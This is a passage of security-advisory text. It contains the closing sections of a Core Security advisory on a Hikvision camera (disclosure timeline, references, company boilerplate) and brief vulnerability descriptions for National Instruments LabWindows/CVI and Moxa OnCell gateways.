Hikvision official contact addresses [3]. No reply received. 2013-07-15: Core attempts to contact vendor. 2013-07-22: Core attempts to contact vendor. 2013-07-30: Core attempts to contact vendor. 2013-08-06: Advisory CORE-2013-0708 published as 'user release'. 9. *References* [1] Hikvision DS-2CD7153-E Network Mini Dome Camera, http://www.hikvision.com/en/products_show.asp?id=506. [3] Hikvision contact page, http://www.hikvision.com/En/US/contactHikvision.asp. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

An ActiveX control in exlauncher.dll in the Help subsystem in National Instruments LabWindows/CVI before 2013 allows remote attackers to cause a denial of service by triggering the display of local example files. LabWindows/CVI is prone to an unspecified security vulnerability. The impact of this issue is currently unknown. We will update this BID when more information emerges. Versions prior to LabWindows/CVI 2013 are vulnerable

Moxa OnCell Gateway G3111, G3151, G3211, and G3251 devices with firmware before 1.4 do not use a sufficient source of entropy for SSH and SSL keys, which makes it easier for remote attackers to obtain access by leveraging knowledge of a key from a product installation elsewhere. Moxa OnCell Gateway can communicate with remote serial / Ethernet devices through GSM / GPRS / EDGE network for data and short message transmission. By calculating the private authentication key, an attacker can gain unauthorized access to the system and read the sensitive information of the device, or send commands to the device. This aids in other attacks. There is a security vulnerability in the Moxa OnCell Gateway module using firmware 1.3 and earlier. The following devices are affected: G3111, G3151, G3211, G3251